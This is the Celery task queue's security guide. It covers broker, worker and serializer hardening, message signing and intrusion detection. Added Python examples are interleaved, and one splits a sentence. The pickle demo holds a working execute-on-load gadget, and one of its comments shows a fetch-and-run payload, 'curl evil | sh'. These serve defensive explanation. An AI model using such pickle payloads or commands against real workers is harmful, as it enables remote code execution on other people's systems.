.. _guide-security:

==========
 Security
==========

.. contents::
    :local:

Introduction
============

While Celery is written with security in mind, it should be treated as an
unsafe component.

Depending on your `Security Policy`_, there are
various steps you can take to make your Celery installation more secure.

.. _`Security Policy`: https://en.wikipedia.org/wiki/Security_policy

Areas of Concern
================

Broker
------

It's imperative that the broker is guarded from unwanted access, especially
if accessible to the public.

By default, workers trust that the data they get from the broker hasn't
been tampered with, so anyone who can publish to the broker can make the
workers run tasks. See `Message Signing`_ for information on how to make
the broker connection more trustworthy.

The first line of defense should be to put a firewall in front of the broker,
allowing only white-listed machines to access it.

Keep in mind that both firewall misconfiguration and temporarily disabling
the firewall are common in the real world. Solid security policy includes
monitoring of firewall equipment to detect if it has been disabled, be it
accidentally or on purpose.

In other words, one shouldn't blindly trust the firewall either.

If your broker supports fine-grained access control, like RabbitMQ,
this is something you should look at enabling.
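The transport-level protection this section refers to (the :setting:`broker_use_ssl` setting), shown here as an added example that is not part of the Celery documentation: a `celeryconfig.py` fragment with the weak form beside the hardened one. The host name, credentials and file paths are placeholders; the dict keys are the ones Celery accepts for the AMQP transport.

```python
"""celeryconfig.py: transport security settings for the broker connection.

Added example, not part of the Celery documentation. The host name,
credentials and file paths are placeholders; the dict keys are the ones
Celery accepts in broker_use_ssl for the AMQP (RabbitMQ) transport.
"""
import ssl

# amqps:// asks the transport for TLS; what gets verified is decided below.
broker_url = "amqps://celery:REPLACE_ME@rabbitmq.internal:5671//"

# Weak form: traffic is encrypted, but CERT_NONE means the broker's
# certificate is never checked, so anyone who can redirect the connection
# can present their own certificate and read or rewrite task messages.
broker_use_ssl_weak = {
    "cert_reqs": ssl.CERT_NONE,
}

# Hardened form: verify the broker against the internal CA and present a
# client certificate so the broker can authenticate this node as well.
broker_use_ssl = {
    "ca_certs": "/etc/celery/tls/internal-ca.pem",  # trust anchor (placeholder path)
    "certfile": "/etc/celery/tls/worker.crt",       # this node's certificate
    "keyfile": "/etc/celery/tls/worker.key",        # private key, mode 0600, root-owned
    "cert_reqs": ssl.CERT_REQUIRED,                 # refuse peers we can't verify
}
# For the Redis transport the equivalent keys are ssl_cert_reqs, ssl_ca_certs,
# ssl_certfile and ssl_keyfile.


def tls_verifies_peer(cfg):
    """Deployment check: does this broker_use_ssl value actually authenticate
    the broker? True only when verification is required and a CA is pinned."""
    if not isinstance(cfg, dict):
        return False  # True/False/None carry no explicit verification settings
    required = cfg.get("cert_reqs", cfg.get("ssl_cert_reqs")) == ssl.CERT_REQUIRED
    return required and bool(cfg.get("ca_certs") or cfg.get("ssl_ca_certs"))
```

`tls_verifies_peer` is the kind of one-line assertion worth running in a deployment smoke test: encryption without `CERT_REQUIRED` and a pinned CA only protects against passive eavesdropping, not against an attacker who can steer the connection.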
See for example
http://www.rabbitmq.com/access-control.html.

If supported by your broker backend, you can enable SSL encryption
and authentication for the broker connection using :setting:`broker_use_ssl`.
This secures the transport between each client or worker and the broker;
it doesn't tell a worker who authored a message, which is what
`Message Signing`_ is for.

Client
------

In Celery, "client" refers to anything that sends messages to the
broker, for example web-servers that apply tasks.

Having the broker properly secured doesn't matter if arbitrary messages
can be sent through a client: a compromised client host, or broker
credentials taken from one, gives an attacker the same power as direct
access to the broker.

*[Need more text here]*

Worker
------

The default permissions of tasks running inside a worker are the same ones as
the privileges of the worker itself. This applies to resources such as
memory, file-systems, and devices.

In addition, when using the multiprocessing based task pool,
which is currently the default, a task also has access to
any memory copied as a result of the :func:`fork` call,
and to memory contents written by tasks previously executed in the same
worker child process.

Limiting access to memory contents can be done by launching every task
in a subprocess (:func:`fork` + :func:`execve`).

Limiting file-system and device access can be accomplished by using
`chroot`_, `jail`_, `sandboxing`_, virtual machines, or other
mechanisms as enabled by the platform or additional software.

Note also that any task executed in the worker will have the
same network access as the machine on which it's running. If the worker
is located on an internal network it's recommended to add firewall rules for
outbound traffic.

.. _`chroot`: https://en.wikipedia.org/wiki/Chroot
.. _`jail`: https://en.wikipedia.org/wiki/FreeBSD_jail
.. _`sandboxing`:
    https://en.wikipedia.org/wiki/Sandbox_(computer_security)
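The fork + execve approach described above, as an added example that is not Celery's own pool code: the task's work runs in a freshly executed interpreter, so it inherits neither the worker's memory (the constructed `BROKER_PASSWORD` global stands in for anything sensitive the worker holds) nor its environment, and it cannot run longer than the timeout. The isolated body is a constructed stand-in that sums numbers and reports what it can see of its parent.

```python
"""Run a task's work in a fresh interpreter (fork + execve) so that it does
not inherit the worker process's memory or environment.

Added example, not Celery's pool implementation. A real deployment would
call run_isolated() from inside a task function.
"""
import json
import os
import subprocess
import sys

# Constructed stand-in for something sensitive in the worker's memory. With the
# default prefork pool a task runs in a forked child and can simply read this.
BROKER_PASSWORD = "hunter2-constructed"

# The child's program. It starts via execve of a new interpreter, so the
# parent's globals are gone; only what arrives on stdin is visible to it.
ISOLATED_BODY = r"""
import json, os, sys
payload = json.load(sys.stdin)
json.dump({
    "sum": sum(payload["numbers"]),
    "sees_parent_global": "BROKER_PASSWORD" in globals(),
    "env": sorted(os.environ),
}, sys.stdout)
"""


def run_isolated(payload, timeout=10):
    """Execute ISOLATED_BODY in a new interpreter and return its JSON result."""
    # Allow-list the environment rather than inheriting it: secrets are
    # routinely passed to workers through environment variables.
    env = {k: os.environ[k] for k in ("PATH", "LANG", "LC_ALL") if k in os.environ}
    proc = subprocess.run(
        # -I: ignore PYTHON* variables and keep the cwd off sys.path
        [sys.executable, "-I", "-c", ISOLATED_BODY],
        input=json.dumps(payload).encode(),
        capture_output=True,
        env=env,
        timeout=timeout,   # a runaway task cannot hold the worker forever
        check=True,        # a crashing child surfaces as an exception, not silent data
    )
    return json.loads(proc.stdout)


if __name__ == "__main__":
    print(run_isolated({"numbers": [1, 2, 3]}))
```

Memory and file-system limits are the next step: on Linux a `preexec_fn` calling `resource.setrlimit`, or running the child under a dedicated unprivileged user in a chroot or container, fits into the same `subprocess.run` call.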
.. _security-serializers:

Serializers
===========

The default serializer is JSON since version 4.0, but since it has
only support for a restricted set of types you may be tempted to
use pickle for serialization instead.

The `pickle` serializer is convenient as it can serialize
almost any Python object, even functions with some work,
but for the same reasons `pickle` is inherently insecure [*]_:
unpickling attacker-controlled bytes executes code of the attacker's
choosing in the worker. It should be avoided whenever clients are
untrusted or unauthenticated.

You can disable untrusted content by specifying
a white-list of accepted content-types in the :setting:`accept_content`
setting; the worker then refuses to deserialize messages of any other type:

.. versionadded:: 3.0.18

.. note::

    This setting was first supported in version 3.0.18. If you're
    running an earlier version it will simply be ignored, so make
    sure you're running a version that supports it.

.. code-block:: python

    accept_content = ['json']

This accepts a list of serializer names and content-types, so you could
also specify the content type for json:

.. code-block:: python

    accept_content = ['application/json']

Celery also comes with a special `auth` serializer that validates
communication between Celery clients and workers, making sure
that messages originate from trusted sources.

Using `Public-key cryptography`_ the `auth` serializer can verify the
authenticity of senders. To enable this, read :ref:`message-signing`
for more information.

.. _`Public-key cryptography`:
    https://en.wikipedia.org/wiki/Public-key_cryptography
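What the allow-list buys you, as an added example that is not kombu's or Celery's implementation: a constructed message envelope and a `decode_message` function standing in for the worker's receive path, fed a pickle payload that runs code when loaded. With `['json']` the message is refused before any deserializer touches the bytes; with pickle allowed, the payload executes. The content-type strings are the ones Celery uses for the two serializers; the marker directory is a harmless stand-in for the damage a real payload would do.

```python
"""Content-type allow-list applied before deserialization, demonstrated
against a pickle payload that executes code on load.

Added example, not kombu's or Celery's code: the envelope and decode_message
are constructed stand-ins for the worker's handling of an incoming message.
"""
import json
import os
import pickle
import shutil
import tempfile

# Content types Celery uses for the two serializers discussed above.
CONTENT_TYPES = {
    "json": "application/json",
    "pickle": "application/x-python-serialize",
}

# Side effect of the constructed payload: a directory the demo can observe.
MARKER = os.path.join(tempfile.gettempdir(), f"celery-pickle-demo-{os.getpid()}")


class ContentDisallowed(Exception):
    """Raised instead of deserializing a message of a non-allow-listed type."""


class Payload:
    """Stand-in for a hostile pickle. pickle calls the callable returned by
    __reduce__ at load time; a real attacker would return something like
    (os.system, ("curl evil | sh",)). Creating a directory is the safe version."""
    def __reduce__(self):
        return (os.makedirs, (MARKER,))


def make_message(body, serializer):
    """Serialize `body` the way a client would, tagging the content type."""
    if serializer == "json":
        data = json.dumps(body).encode()
    elif serializer == "pickle":
        data = pickle.dumps(body)
    else:
        raise ValueError(serializer)
    return {"content_type": CONTENT_TYPES[serializer], "body": data}


def decode_message(message, accept_content):
    """Deserialize only if the content type is allow-listed.

    accept_content takes serializer names or content types, mirroring the
    Celery setting: ['json'] and ['application/json'] mean the same thing.
    """
    allowed = {CONTENT_TYPES.get(name, name) for name in accept_content}
    ctype = message["content_type"]
    if ctype not in allowed:
        # Rejected before any deserializer sees the bytes.
        raise ContentDisallowed(f"refusing to deserialize {ctype!r}")
    if ctype == CONTENT_TYPES["json"]:
        return json.loads(message["body"])
    return pickle.loads(message["body"])  # only reachable when pickle is allowed


def demo():
    """Deliver the same hostile message to an allow-listing and a permissive
    worker. Returns (rejected_by_allowlist, code_ran_under_allowlist,
    code_ran_when_pickle_allowed)."""
    hostile = make_message(Payload(), "pickle")
    shutil.rmtree(MARKER, ignore_errors=True)
    try:
        decode_message(hostile, ["json"])
        rejected = False
    except ContentDisallowed:
        rejected = True
    ran_under_allowlist = os.path.isdir(MARKER)
    decode_message(hostile, ["json", "pickle"])  # worker that accepts pickle
    ran_when_permissive = os.path.isdir(MARKER)
    shutil.rmtree(MARKER, ignore_errors=True)
    return rejected, ran_under_allowlist, ran_when_permissive
```

Note that the check keys off the content type the sender declared, which is why the allow-list must be enforced on the worker: a client that can publish to the broker can label its payload however it likes.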
.. _message-signing:

Message Signing
===============

Celery can use the :pypi:`pyOpenSSL` library to sign messages using
`Public-key cryptography`_, where
messages sent by clients are signed using a private key
and then later verified by the worker using a public `X.509`_ certificate.

Ideally certificates should be signed by an official
`Certificate Authority`_, but they can also be self-signed.

To enable this you should configure the :setting:`task_serializer`
setting to use the `auth` serializer.
Also required is configuring the
paths used to locate private keys and certificates on the file-system:
the :setting:`security_key`,
:setting:`security_certificate`, and :setting:`security_cert_store`
settings respectively.

With these configured it's also necessary to call the
:func:`celery.setup_security` function. Note that this will also
disable all insecure serializers so that the worker won't accept
messages with untrusted content types.

This is an example configuration using the `auth` serializer,
with the private key and certificate files located in `/etc/ssl`.

.. code-block:: python

    from celery import Celery

    app = Celery()
    app.conf.update(
        security_key='/etc/ssl/private/worker.key',
        security_certificate='/etc/ssl/certs/worker.pem',
        security_cert_store='/etc/ssl/certs/*.pem',
    )
    app.setup_security()

.. note::

    While relative paths aren't disallowed, using absolute paths
    is recommended for these files.

    Every certificate matched by :setting:`security_cert_store` is a
    certificate the worker will accept signatures from, so the glob
    should match only the certificates of clients allowed to submit
    tasks, not a system-wide bundle of unrelated certificates.

    Also note that the `auth` serializer won't encrypt the contents of
    a message, so if needed this will have to be enabled separately.

.. _`X.509`: https://en.wikipedia.org/wiki/X.509
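The sign-then-verify flow the `auth` serializer is built on, as an added example that is not Celery's serializer: the envelope layout is my own, and the certificate store is simplified to a dict mapping signer name to public key where Celery reads X.509 certificates from :setting:`security_cert_store`. It assumes the `cryptography` package is installed and generates throwaway RSA keys in-process. The constructed scenario has one trusted client and an attacker who can publish to the broker; a genuine message is accepted, while a body rewritten in transit and a message signed with the attacker's own key under the client's name are both rejected before the body is parsed.

```python
"""Sign-then-verify flow of the kind the `auth` serializer implements.

Added example, not Celery's serializer. Requires the `cryptography`
package; keys are generated here purely for the demonstration.
"""
import base64
import json

from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa


class SecurityError(Exception):
    """Unknown signer, bad signature or disallowed content type."""


def _signed_bytes(signer, content_type, body):
    # Bind the signer identity and content type into the signed data so
    # neither can be swapped without invalidating the signature.
    return b"\0".join([signer.encode(), content_type.encode(), body])


def sign_message(private_key, signer, body, content_type="application/json"):
    """Client side: serialize first, then sign with the client's private key."""
    signature = private_key.sign(_signed_bytes(signer, content_type, body),
                                 padding.PKCS1v15(), hashes.SHA256())
    return {
        "signer": signer,
        "content_type": content_type,
        "body": base64.b64encode(body).decode(),
        "signature": base64.b64encode(signature).decode(),
    }


def verify_and_decode(envelope, cert_store, accept_content=("application/json",)):
    """Worker side: check the type, look up the signer, verify, only then parse."""
    ctype = envelope["content_type"]
    if ctype not in accept_content:
        raise SecurityError(f"content type {ctype!r} not accepted")
    public_key = cert_store.get(envelope["signer"])
    if public_key is None:
        raise SecurityError(f"unknown signer {envelope['signer']!r}")
    body = base64.b64decode(envelope["body"])
    try:
        public_key.verify(base64.b64decode(envelope["signature"]),
                          _signed_bytes(envelope["signer"], ctype, body),
                          padding.PKCS1v15(), hashes.SHA256())
    except InvalidSignature:
        raise SecurityError("signature does not match message") from None
    return json.loads(body)


def demo():
    """Constructed scenario: one trusted client ("webapp") and an attacker
    who can publish to the broker. Returns the worker's verdict per message."""
    client_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    attacker_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    cert_store = {"webapp": client_key.public_key()}  # only the webapp is trusted

    task = json.dumps({"task": "send_invoice", "args": [42]}).encode()
    genuine = sign_message(client_key, "webapp", task)

    tampered = dict(genuine)  # attacker on the broker rewrites the arguments
    tampered["body"] = base64.b64encode(
        json.dumps({"task": "send_invoice", "args": [1]}).encode()).decode()

    forged = sign_message(attacker_key, "webapp", task)  # claims to be webapp

    results = {}
    for name, env in [("genuine", genuine), ("tampered", tampered), ("forged", forged)]:
        try:
            results[name] = verify_and_decode(env, cert_store)
        except SecurityError as exc:
            results[name] = str(exc)
    return results
```

The order inside `verify_and_decode` is the point: the content-type check and the signature check both happen on raw bytes, and `json.loads` runs only on a body whose author is known. Swapping the last two steps would hand untrusted data to the deserializer before anyone has vouched for it.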
.. _`Certificate Authority`:
    https://en.wikipedia.org/wiki/Certificate_authority

Intrusion Detection
===================

The most important part when defending your systems against
intruders is being able to detect if the system has been compromised.

Logs
----

Logs are usually the first place to look for evidence
of security breaches, but they're useless if they can be tampered with.

A good solution is to set up centralized logging with a dedicated logging
server. Access to it should be restricted.
In addition to having all of the logs in a single place, if configured
correctly, it can make it harder for intruders to tamper with your logs.

This should be fairly easy to set up using syslog (see also `syslog-ng`_ and
`rsyslog`_). Celery uses the :mod:`logging` library, and already has
support for using syslog.

A tip for the paranoid is to send logs using UDP and cut the
transmit part of the logging server's network cable :-)

.. _`syslog-ng`: https://en.wikipedia.org/wiki/Syslog-ng
.. _`rsyslog`: http://www.rsyslog.com/

Tripwire
--------

`Tripwire`_ is a (now commercial) data integrity tool, with several
open source implementations, used to keep
cryptographic hashes of files in the file-system, so that administrators
can be alerted when they change. This way when the damage is done and your
system has been compromised you can tell exactly what files intruders
have changed (password files, logs, back-doors, root-kits, and so on).

Often this is the only way you'll be able to detect an intrusion.
The hash database deserves the same care as the logs: an intruder who can
rewrite it can re-baseline their own changes, so keep it on read-only
media or off the host.

Some open source implementations include:

* `OSSEC`_
* `Samhain`_
* `Open Source Tripwire`_
* `AIDE`_

Also, the `ZFS`_ file-system comes with built-in integrity checks
that can be used.

.. _`Tripwire`: http://tripwire.com/
.. _`OSSEC`: http://www.ossec.net/
.. _`Samhain`: http://la-samhna.de/samhain/index.html
.. _`AIDE`: http://aide.sourceforge.net/
.. _`Open Source Tripwire`: http://sourceforge.net/projects/tripwire/
.. _`ZFS`: https://en.wikipedia.org/wiki/ZFS
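The core of what the tools listed above do, as an added example that is not the code of Tripwire, AIDE or any of the others: record a SHA-256 digest plus size and mode for every regular file under a directory, store that baseline, and later report what was added, removed or changed. The sample file tree and the intruder's edits (weakening a config, dropping a backdoor, deleting a log) are constructed in a temporary directory.

```python
"""Minimal file-integrity baseline and comparison of the kind Tripwire and
AIDE perform. Added example, not any of those tools' code; the sample tree
is constructed in a temporary directory.
"""
import hashlib
import json
import os
import stat
import tempfile


def snapshot(root):
    """Map relative path -> {sha256, size, mode} for every regular file."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, devices, sockets
            digest = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    digest.update(chunk)
            baseline[os.path.relpath(path, root)] = {
                "sha256": digest.hexdigest(),
                "size": st.st_size,
                "mode": oct(stat.S_IMODE(st.st_mode)),  # a chmod +s is a change too
            }
    return baseline


def compare(baseline, current):
    """Return {'added': [...], 'removed': [...], 'changed': [...]}."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "changed": sorted(p for p in baseline.keys() & current.keys()
                          if baseline[p] != current[p]),
    }


def demo():
    """Constructed scenario: take a baseline, then simulate an intruder
    editing a config, dropping a backdoor and deleting a log."""
    sample = {
        "etc/celery.conf": b"broker_url = amqps://...\n",
        "var/log/worker.log": b"worker ready\n",
        "bin/celery": b"#!/bin/sh\nexec python -m celery \"$@\"\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, data in sample.items():
            os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)

        # The baseline must live where the intruder cannot edit it (off-box or
        # read-only media); serializing it to JSON stands in for that here.
        stored = json.dumps(snapshot(root))

        with open(os.path.join(root, "etc/celery.conf"), "ab") as fh:
            fh.write(b"task_serializer = pickle\n")  # weakening the config
        with open(os.path.join(root, "bin/.backdoor"), "wb") as fh:
            fh.write(b"malicious\n")
        os.remove(os.path.join(root, "var/log/worker.log"))  # covering tracks

        return compare(json.loads(stored), snapshot(root))
```

Run `snapshot` from a trusted boot or over a read-only mount where possible: a rootkit on the live system can lie to `open` and `lstat` just as easily as it lies to `ls`.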
.. rubric:: Footnotes

.. [*] https://blog.nelhage.com/2011/03/exploiting-pickle/